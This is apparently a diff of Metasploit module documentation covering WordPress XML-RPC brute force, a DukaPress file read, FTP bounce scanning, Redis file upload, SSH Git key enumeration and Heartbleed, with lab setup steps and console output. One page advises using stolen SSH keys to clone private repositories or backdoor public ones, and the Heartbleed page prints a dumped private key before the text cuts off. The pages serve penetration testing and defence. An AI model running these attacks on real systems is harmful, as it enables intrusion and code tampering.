+Install [Docksal](https://docksal.io/)
+
+Create a new WordPress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wordpress_xmlrpc_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```set USERNAME [user]```
+5. Do: ```set PASSWORD [pass]```
+6. Do: ```run```
+
+## Options
+
+**USERNAME**
+
+A specific username to authenticate as
+
+**USER_FILE**
+
+File containing usernames, one per line
+
+**PASSWORD**
+
+A specific password to authenticate with
+
+**PASS_FILE**
+
+File containing passwords, one per line
+
+**USERPASS_FILE**
+
+File containing users and passwords separated by space, one pair per line
+
+**USER_AS_PASS**
+
+Try the username as the password for all users (default: `false`)
+
+
+## Scenarios
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin
+USERNAME => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin
+PASSWORD => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run
+
+[*] 192.168.64.100:80    :/xmlrpc.php - Sending Hello...
+[+] 192.168.64.100:80 - XMLRPC enabled, Hello message received!
+[*] Starting XML-RPC login sweep...
+[+] 192.168.64.100:80 - Success: 'admin:admin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 
+
+```
+
+
+### Wordpress 5.2 with disabled or protected XMLRPC
+
+You may see this message also, if you forgot to set the `VHOST` option.
+
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_xmlrpc_login 
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set USERNAME admin
+USERNAME => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > set PASSWORD admin
+PASSWORD => admin
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > run
+
+[*] 192.168.64.100:80    :/xmlrpc.php - Sending Hello...
+[-] XMLRPC is not enabled! Aborting
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > 
+
+```

documentation/modules/auxiliary/scanner/http/wp_dukapress_file_read.md

@@ -0,0 +1,157 @@
+## Description
+
+This module exploits a directory traversal vulnerability in WordPress Plugin
+"DukaPress" version 2.5.3, allowing to read arbitrary files with the
+web server privileges.
+
+## Vulnerable Application
+
+### Wordpress with installed DukaPress <= 2.5.3
+* [https://wordpress.org/plugins/dukapress](https://wordpress.org/plugins/dukapress)
+* [Plugin v2.5.3](https://downloads.wordpress.org/plugin/dukapress.2.5.3.zip)
+
+### Setup using Docksal
+Install [Docksal](https://docksal.io/)
+
+Create a new Wordpress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+Download the wordpress plugin
+
+```
+cd msf-wp/wp-content/plugins
+wget https://downloads.wordpress.org/plugin/dukapress.2.5.3.zip
+unzip dukapress.2.5.3.zip
+
+```
+
+Login and click on DukaPress "Activate" Link
+
+```
+http://msf-wp.docksal/wp-admin/plugins.php
+user: admin
+pass: admin
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wp_dukapress_file_read```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```run```
+
+## Options
+
+**FILEPATH**
+
+The path to the file to read (default: `/etc/passwd`)
+
+**DEPTH**
+
+Traversal Depth (to reach the root folder) (default: `7`)
+
+
+## Scenarios
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+````
+msf5 > use auxiliary/scanner/http/wp_dukapress_file_read
+msf5 > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 > run
+
+[*] Downloading file...
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/bin/false
+sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
+docker:x:1000:1000::/home/docker:/bin/bash
+
+[+] File saved in: /home/weh/.msf4/loot/20191009203058_default_192.168.64.100_dukapress.file_560342.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/portscan/ftpbounce.md

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Enumerate TCP services via the FTP bounce PORT/LIST method
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/portscan/ftpbounce`
+3. Do: `set BOUNCEHOST [ip]`
+4. Do: `set PORTS [number(s)]`
+5. Do: `set RHOSTS [ip]`
+6. Do: `set FTPUSER [user]`
+7. Do: `set FTPPASS [password]`
+8. Do: `run`
+
+## Scenarios
+
+Docker Usage:  `docker run -e "ADDED_FLAGS=-w -W -d -d" -e FTP_USER_NAME=bob -e FTP_USER_PASS=12345 -e FTP_USER_HOME=/home/bob stilliard/pure-ftpd`
+
+### PureFTPd and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/portscan/ftpbounce
+  msf auxiliary(scanner/portscan/ftpbounce) > set BOUNCEHOST 172.17.0.2
+    BOUNCEHOST => 172.17.0.2
+  msf auxiliary(scanner/portscan/ftpbounce) > set PORTS 8080
+    BOUNCEPORT => 8080
+  msf auxiliary(scanner/portscan/ftpbounce) > set RHOSTS 172.17.0.4
+    RHOSTS => 172.17.0.4
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPUSER bob
+    FTPUSER => bob
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPPASS 12345
+    FTPPASS => 12345
+  msf auxiliary(scanner/portscan/ftpbounce) > run
+
+    [+] 172.17.0.2:21 -  TCP OPEN 172.17.0.4:8080
+    [*] 172.17.0.2:21 - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+#### Manual Exploitation
+
+  ```
+  root@ubuntu:~# nmap -p 8080 -v -b bob:12345@172.17.0.2 172.17.0.4 -Pn
+
+    Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-25 20:34 UTC
+    Resolved FTP bounce attack proxy to 172.17.0.2 (172.17.0.2).
+    Initiating Parallel DNS resolution of 1 host. at 20:34
+    Completed Parallel DNS resolution of 1 host. at 20:34, 0.00s elapsed
+    Attempting connection to ftp://bob:12345@172.17.0.2:21
+    Connected:220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+    220-You are user number 1 of 5 allowed.
+    220-Local time is now 20:34. Server port: 21.
+    220-This is a private system - No anonymous login
+    220-This server supports FXP transfers
+    220-IPv6 connections are also welcome on this server.
+    220 You will be disconnected after 15 minutes of inactivity.
+    Login credentials accepted by FTP server!
+    Initiating Bounce Scan at 20:34
+    Discovered open port 8080/tcp on 172.17.0.4
+    Completed Bounce Scan at 20:34, 0.00s elapsed (1 total ports)
+    Nmap scan report for 172.17.0.4
+    Host is up.
+
+    PORT     STATE SERVICE
+    8080/tcp open  http-proxy
+  ```

documentation/modules/auxiliary/scanner/redis/file_upload.md

@@ -0,0 +1,56 @@
+## Description
+
+Redis is an in-memory data structure project implementing a distributed, in-memory key-value database with optional durability. Redis supports different kinds of abstract data structures, such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indexes.
+
+This module can be used to leverage functionality exposed by Redis to achieve somewhat arbitrary file upload to a file and directory to which the user account running the redis instance has access.  It is not totally arbitrary because the exact contents of the file cannot be completely controlled given the nature of how Redis stores its database on disk.
+
+## Vulnerable Application
+
+This module is tested on two different Redis server instances.
+Virtual testing environments (inside docker container): 
+
+ - Redis 5.0.6
+ - Redis 4.0.14
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/redis/file_upload`
+  2. Do: `set rhosts [ips]`
+  3. Do: `set LocalFile [local_file_path_to_be_uploaded]`
+  4. Do: `set RemoteFile [remote_file_destination]`
+  5. Do: `run`
+
+## Options
+
+**DISABLE_RDBCOMPRESSION**
+
+If set to `false`, redis server will disable compression before saving. Defaults to `true`.
+
+**FLUSHALL**
+
+If set to `true`, redis server will remove all redis data before saving. Defaults to `false`.
+
+**LocalFile**
+
+Path to the local file to be uploaded.
+
+**RemoteFile**
+
+Path, or file name, to store the file as on the Redis server.
+
+## Scenarios
+
+### Redis: 4.0.14 inside a docker container
+  ```
+msf5 auxiliary(scanner/redis/file_upload) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf5 auxiliary(scanner/redis/file_upload) > set LocalFile redis_upload_test.txt
+LocalFile => redis_upload_test.txt
+msf5 auxiliary(scanner/redis/file_upload) > set RemoteFile redis_upload_test.txt
+RemoteFile => redis_upload_test.txt
+msf5 auxiliary(scanner/redis/file_upload) > run
+
+[+] 172.17.0.2:6379       - 172.17.0.2:6379       -- saved 23 bytes inside of redis DB at redis_upload_test.txt
+[*] 172.17.0.2:6379       - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/redis/redis_server.md

@@ -0,0 +1,41 @@
+## Description
+
+Redis is an in-memory data structure project implementing a distributed, in-memory key-value database with optional durability.
+Redis supports different kinds of abstract data structures, such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indexes.
+
+This module locates Redis endpoints by attempting to run a specified Redis command.
+
+## Vulnerable Application
+
+This module is tested on two different Redis server instances.
+Virtual testing environments (inside docker container): 
+
+ - Redis 5.0.6
+ - Redis 4.0.14
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/redis/redis_server`
+  2. Do: `set rhosts [ips]`
+  3. Do: `run`
+
+## Options
+
+**COMMAND**
+
+Requires a valid redis command to be executed on rhosts. Defaults to `INFO`. 
+Redis commands list can be found [here](https://redis.io/commands).
+
+## Scenarios
+
+### Redis: 4.0.14 inside a docker container
+  ```
+msf5 auxiliary(scanner/redis/redis_server) > use auxiliary/scanner/redis/redis_server
+msf5 auxiliary(scanner/redis/redis_server) > set RHOSTS 172.17.0.3
+RHOSTS => 172.17.0.3
+msf5 auxiliary(scanner/redis/redis_server) > run
+
+[+] 172.17.0.3:6379       - Found redis with INFO command: $2701\x0d\x0a# Server\x0d\x0aredis_version:4.0.14\x0d\x0aredis_git_sha1:00000000\x0d\x0aredis_git_dirty:0\x0d\x0aredis_build_id:30850c2ae048947f\x0d\x0aredis_mode:standalone\x0d\x0aos:Linux 4.19.69-1-MANJARO x86_64\x0d\x0aarch_bits:64\x0d\x0amultiplexing_api:epoll\x0d\x0aatomicvar_api:atomic-builtin\x0d\x0agcc_version:8.3.0\x0d\x0aprocess_id:1\x0d\x0arun_id:de1d3d4547ce93ecad76de2efdbcf7ae2d456613\x0d\x0atcp_port:6379\x0d\x0auptime_in_seconds:564\x0d\x0auptime_in_days:0\x0d\x0ahz:10\x0d\x0alru_clock:10154159\x0d\x0aexecutable:/data/redis-server\x0d\x0aconfig_file:\x0d\x0a\x0d\x0a# Clients\x0d\x0aconnected_clients:1\x0d\x0aclient_longest_output_list:0\x0d\x0aclient_biggest_input_buf:0\x0d\x0ablocked_clients:0\x0d\x0a\x0d\x0a# Memory\x0d\x0aused_memory:849224\x0d\x0aused_memory_human:829.32K\x0d\x0aused_memory_rss:4464640\x0d\x0aused_memory_rss_human:4.26M\x0d\x0aused_memory_peak:849224\x0d\x0aused_memory_peak_human:829.32K\x0d\x0aused_memory_peak_perc:100.00%\x0d\x0aused_memory_overhead:836126\x0d\x0aused_memory_startup:786488\x0d\x0aused_memory_dataset:13098\x0d\x0aused_memory_dataset_perc:20.88%\x0d\x0atotal_system_memory:12010311680\x0d\x0atotal_system_memory_human:11.19G\x0d\x0aused_memory_lua:37888\x0d\x0aused_memory_lua_human:37.00K\x0d\x0amaxmemory:0\x0d\x0amaxmemory_human:0B\x0d\x0amaxmemory_policy:noeviction\x0d\x0amem_fragmentation_ratio:5.26\x0d\x0amem_allocator:jemalloc-4.0.3\x0d\x0aactive_defrag_running:0\x0d\x0alazyfree_pending_objects:0\x0d\x0a\x0d\x0a# Persistence\x0d\x0aloading:0\x0d\x0ardb_changes_since_last_save:0\x0d\x0ardb_bgsave_in_progress:0\x0d\x0ardb_last_save_time:1570434683\x0d\x0ardb_last_bgsave_status:ok\x0d\x0ardb_last_bgsave_time_sec:-1\x0d\x0ardb_current_bgsave_time_sec:-1\x0d\x0ardb_last_cow_size:0\x0d\x0aaof_enabled:0\x0d\x0aaof_rewrite_in_progress:0\x0d\x0aaof_rewrite_scheduled:0\x0d\x0aaof_last_rewrite_time_sec:-1\x0d\x0aaof_current_rewrite_time_sec:-1\x0d\x0aaof_last_bgrewrite_status:ok\x0d\x0aaof_last_write_status:ok\x0d\x0aaof_last_cow_size:0\x0d\x0a\x0d\x0a# Stats\x0d\x0atotal_connections_received:5\x0d\x0atotal_commands_processed:3\x0d\x0ainstantaneous_ops_per_sec:0\x0d\x0atotal_net_input_bytes:79\x0d\x0atotal_net_output_bytes:8191\x0d\x0ainstantaneous_input_kbps:0.00\x0d\x0ainstantaneous_output_kbps:0.00\x0d\x0arejected_connections:0\x0d\x0async_full:0\x0d\x0async_partial_ok:0\x0d\x0async_partial_err:0\x0d\x0aexpired_keys:0\x0d\x0aexpired_stale_perc:0.00\x0d\x0aexpired_time_cap_reached_count:0\x0d\x0aevicted_keys:0\x0d\x0akeyspace_hits:0\x0d\x0akeyspace_misses:0\x0d\x0apubsub_channels:0\x0d\x0apubsub_patterns:0\x0d\x0alatest_fork_usec:0\x0d\x0amigrate_cached_sockets:0\x0d\x0aslave_expires_tracked_keys:0\x0d\x0aactive_defrag_hits:0\x0d\x0aactive_defrag_misses:0\x0d\x0aactive_defrag_key_hits:0\x0d\x0aactive_defrag_key_misses:0\x0d\x0a\x0d\x0a# Replication\x0d\x0arole:master\x0d\x0aconnected_slaves:0\x0d\x0amaster_replid:0d4b69672220406a209cf68d63e22215f5bc8741\x0d\x0amaster_replid2:0000000000000000000000000000000000000000\x0d\x0amaster_repl_offset:0\x0d\x0asecond_repl_offset:-1\x0d\x0arepl_backlog_active:0\x0d\x0arepl_backlog_size:1048576\x0d\x0arepl_backlog_first_byte_offset:0\x0d\x0arepl_backlog_histlen:0\x0d\x0a\x0d\x0a# CPU\x0d\x0aused_cpu_sys:0.66\x0d\x0aused_cpu_user:0.45\x0d\x0aused_cpu_sys_children:0.00\x0d\x0aused_cpu_user_children:0.00\x0d\x0a\x0d\x0a# Cluster\x0d\x0acluster_enabled:0\x0d\x0a\x0d\x0a# Keyspace
+[*] 172.17.0.3:6379       - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.md

@@ -0,0 +1,59 @@
+## Introduction
+
+This module attempts to authenticate to Git servers using compromised SSH private keys. This module can be used to check a single key or recursively look through a directory. It will not attempt to check keys that have a passphrase, however a bruteforce attack could be launched on a key and then the passphrase could be disabled.
+
+## Setup
+
+1. `ssh-keygen -b 2048 -t rsa`
+2. Add the RSA pubic key to a GitHub or GitLab account (Public ends in .pub)
+3. Follow the usage instructions below
+4. Either use KEY_FILE or KEY_DIR to specify the generated SSH private key
+5. Run the module
+6. Observe that it will identify the GitHub/GitLab user that this key belongs to
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/ssh_enum_git_keys
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh
+KEY_DIR => /Users/w/.ssh
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > run
+
+Git Access Data
+===============
+
+Key Location              User Access
+------------              -----------
+/Users/w/.ssh/id_ed25519  wdahlenburg
+
+[*] Auxiliary module execution completed
+```
+## Post Exploitation
+
+Once you have identified a Git user from an SSH key, there are two immediate possibilities.
+
+1. Download private repositories that the owner knows
+2. Modify public repositories and inject a backdoor
+
+To begin either, the valid keys will need to be added to the current `~/.ssh/config`.
+
+Example: Using a valid key at /Users/w/.ssh/id_ed25519
+
+1. Write the following to `~/.ssh/config`
+`Host github
+    User git
+    Hostname github.com
+    PreferredAuthentications publickey
+    IdentityFile /Users/w/.ssh/id_ed25519
+    `
+2. Clone a repo using the key
+` $ git clone github:<username>/Repo.git`
+3. Alternatively, modify an existing local repo by modifying the .git/config file
+```
+...
+[remote "origin"]
+    url = github:username/reponame.git
+...
+
+```
+4. Any changes will be pushed using the specified key. Make sure you set the git aliases to match your target.

documentation/modules/auxiliary/scanner/ssh/ssh_version.md

@@ -0,0 +1,34 @@
+## Description
+
+SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+
+This module identifies the version of SSH service in use by the server based on the server's banner. Any SSH server should return this information.
+
+## Vulnerable Application
+
+This module is tested on several different SSH services, such as:
+
+- Virtual testing environment: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
+- `github.com`: SSH-2.0-babeld-38be96bc
+- `gitlab.com`: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/ssh/ssh_version`
+  2. Do: `set rhosts [ips]`
+  3. Do: `run`
+
+## Scenarios
+
+### SSH-2.0 on GitHub
+
+  ```
+msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_version
+msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com
+RHOSTS => github.com
+msf5 auxiliary(scanner/ssh/ssh_version) > run
+
+[+] 140.82.118.4:22       - SSH server version: SSH-2.0-babeld-38be96bc
+[*] github.com:22         - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md

@@ -0,0 +1,383 @@
+
+## Vulnerable Application
+
+The heartbleed bug was extremely well [documented](http://heartbleed.com), but essentially boils down to a client being able to specify
+how much memory is retrieved from the server when performing a TLS heartbeat.  This results in an arbitrary memory read, where an attacker
+is able to read the contents of memory.
+
+### Install OpenSSL 1.0.1d on Ubuntu 18.04
+
+The following commands will download OpenSSL 1.0.1d, build and install it.
+Finally, we'll use the built in `s_server` to start the service to be scanned.
+`install_sw` is used to prevent an `install` [error](https://askubuntu.com/questions/454575/error-255-when-trying-to-install-openssl-1-0-1g-from-source). 
+
+```
+sudo apt-get install build-essential
+wget https://www.openssl.org/source/old/1.0.1/openssl-1.0.1d.tar.gz
+tar -zxf openssl-1.0.1d.tar.gz && cd openssl-1.0.1d
+./config
+sudo make
+sudo make install_sw
+openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
+/usr/local/ssl/bin/openssl s_server -key key.pem -cert cert.pem -accept 44330 -www
+```
+
+If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
+IP and hostname to your hosts file.
+
+## Verification Steps
+
+  1. Install a vulnerable OpenSSL, start the service
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/ssl/openssl_heartbleed```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set action [ACTION]```
+  6. Do: ```run```
+
+## Options
+
+  **Action**
+
+  * SCAN: Scan the host to see if it is vulnerable.  If `verbose` is set to `true`, also print the memory that was dumped.  This is the default.
+  * DUMP: Dump the memory and store it as loot.
+  * KEYS: Similar to DUMP but scan the results for the private key.
+
+  **TLS_CALLBACK**
+
+  Protocol to use if a specific underlying protocol is required.  Default is `None`.
+
+  **TLS_VERSION**
+
+  The specific version of TLS (or SSL) to use, if only specific ones are avaialble.  Defaults to `1.0` (TLS1.0).
+
+  **MAX_KEYTRIES**
+
+  If Action is set to `KEYS`, the maximum amount of times to dump memory and attempt to retrieve the private key.
+  Similar to `LEAK_COUNT` but only applies to `KEYS`.  Default is `50`.
+
+  **STATUS_EVERY**
+
+  If Action is set to `KEYS`, how often the status should be printed.  Default is `5`.
+
+  **DUMPFILTER**
+
+  A regular expresion (used in scan function) to use to filter the dump before storing.  Default is `nil`.
+
+  **RESPONSE_TIMEOUT**
+
+  How long to wait for the server to respond in seconds.  Default is `10`.
+
+  **LEAK_COUNT**
+
+  If Action is set to `SCAN` or `DUMP`, the maximum amount of times to dump memory.
+  Similar to `MAX_KEYTRIES`.  Default is `1`.
+
+## Advanced Options
+
+  **HEARTBEAT_LENGTH**
+
+  How much memory should attempt to be retrieved.  Default is `65535`.
+
+  **XMPPDOMAIN**
+
+  If `jabber` is selected for `TLS_CALLBACK`, the domain to use.  Default is `localhost`.
+
+## Scenarios
+
+### SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
+
+With the default action of `SCAN` we can determine if the server is vulnerable or not.
+
+```
+msf5 > use auxiliary/scanner/ssl/openssl_heartbleed 
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
+rhosts => 222.222.2.222
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330
+rport => 44330
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
+
+[+] 222.222.2.222:44330   - Heartbeat response with leak, 65535 bytes
+[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
+
+In order to help elicit the keys, we can run the following code to help populate memory with
+the keys:
+
+```
+watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem'
+```
+
+```
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
+action => KEYS
+msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
+
+[*] 222.222.2.222:44330   - Scanning for private keys
+[*] 222.222.2.222:44330   - Getting public key constants...
+[*] 222.222.2.222:44330   - 2019-10-13 01:32:17 UTC - Starting.
+[*] 222.222.2.222:44330   - 2019-10-13 01:32:17 UTC - Attempt 0...
+[+] 222.222.2.222:44330   - 2019-10-13 01:32:18 UTC - Got the private key
+[*] 222.222.2.222:44330   - -----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA7ax3L0LRt5uZQTFOiJkX2xRn9ww/G87gMkMBAdeEzph7a2/i
+C4stnajh9NsUbACv+dt8mtwgh0Vg4lMaI5iB9lXlqfsR17vIsW+/AZXj3Eo+B0QU
+l8MpVilDvm3Hee0tE9NGLMR+Vk1Eq0UL+w7Gc/IswkFtj8XGMQ3Jc6OaJ6Ofh5hF
+VlmyQBrtwvZ/20g5KtMbZFv1XX28bjEd47qfTo8nrnCsrjD7h7R42GrRw9hhvWse
+sEa9VyTwQF0W8mxTYFx/7evXeJNVw1drmhJrxpGfb9gl8qzQgf6PQoi1LXaPAdk5
+1cshKeGXmcA+1FR5HOdvWEqzCjMxApzdExNSgwIDAQABAoIBACmdYAT7ayL98JiU
+nI6YV6/5Y7bDAy3ITEMgrkV3Sf6ufjWykl65ENShJGcuEOZUPHvALZIj5uIoiK04
+JcSDyIWsRpk7p8UhUSOYUFZju1DwAupcxkpIVq2Kbh0itaGooJLvFEN0aDaOMu7W
+GSHtVVwp1CJzOE7LL0eZhWNlCvHTgwwobaAUYEyrDmkOdWskMC3RGu5JrrfKTK+5
+VUwMMAJ7Wf+d+xeTrNHwGGdEvHd23p1B1E3+axG0XqxI7wODz14iAWgd1zp2gSq2
+Ji/II0E8Okwl3AR0d8SD0cJeEPHWlrr/6LzBUTHanDBGe2SXP/SMFSvyEpoPw/s8
+vovI1okCgYEA8Ju7TuE4V2UQjZi8qcNAFnbxfcS9bk8S+BBKkgKtMY6wZT8h03fP
+ouYot1IaRxMVlErrUeVtD/YKD+nhNFFYZGCSChjAhvf1rq/wzRILWpdGZ3SF9UuR
+NlNpH1DcVZPOdTxCJ8DfjY72m/ugYysorQdmo9L58BhMKbfp9aHOR0cCgYEA/OCs
+73xWEECKS7of0B+3CKriYT7fROu5wP9gFl3/FR8q7275TG2Iwg0rDz4NLGJhcVQ8
+4bNAz+OglxqXkIVOf5Cuj8DibAw2JTr+MP5wQUaB0fPdwPcNw/fBq68x/+UpdcM2
+B98b2uykN3Q2Zd2g3VVrKUOb4yJlE1EEvVrt8OUCgYEAq6oQe3jIn+Hla4D7qgs6
+IE0AgwDpPliAaigFbCMoumDZjYL7eUrUA58+kXysbuU40jKZrjaIF4ktKKlvGcqn
+zAXya+24/xLOYLH6lfU30Ix5mLpUEOy3UBE2wTcJ3Ky18oLpmD9NwEutuyBOEDLs
+tHbBTkTqOdi8Dk+/RpcI+2UCgYEAj5qDeqiwMyCDqMd0w3sPNTPdxP2wSvJWlVww
+0+LjNbpyZnAt0JIvZIuX1VsWngrsbTA6Nq3V83i/vK+UPLUHQ/gEuYv+yP8STIg4
+y9fiJZ+Fn5YOa0OhJJVw/S9LhJc9uSt3Znbz2ZojE37CWYzHiom0hkVnpE/m+FY9
+C880amUCgYAw8b+F3iBCEzioeUWW62c89yQaV0Ci/BQgvkhLsRRZr5hlt8+NWjSv
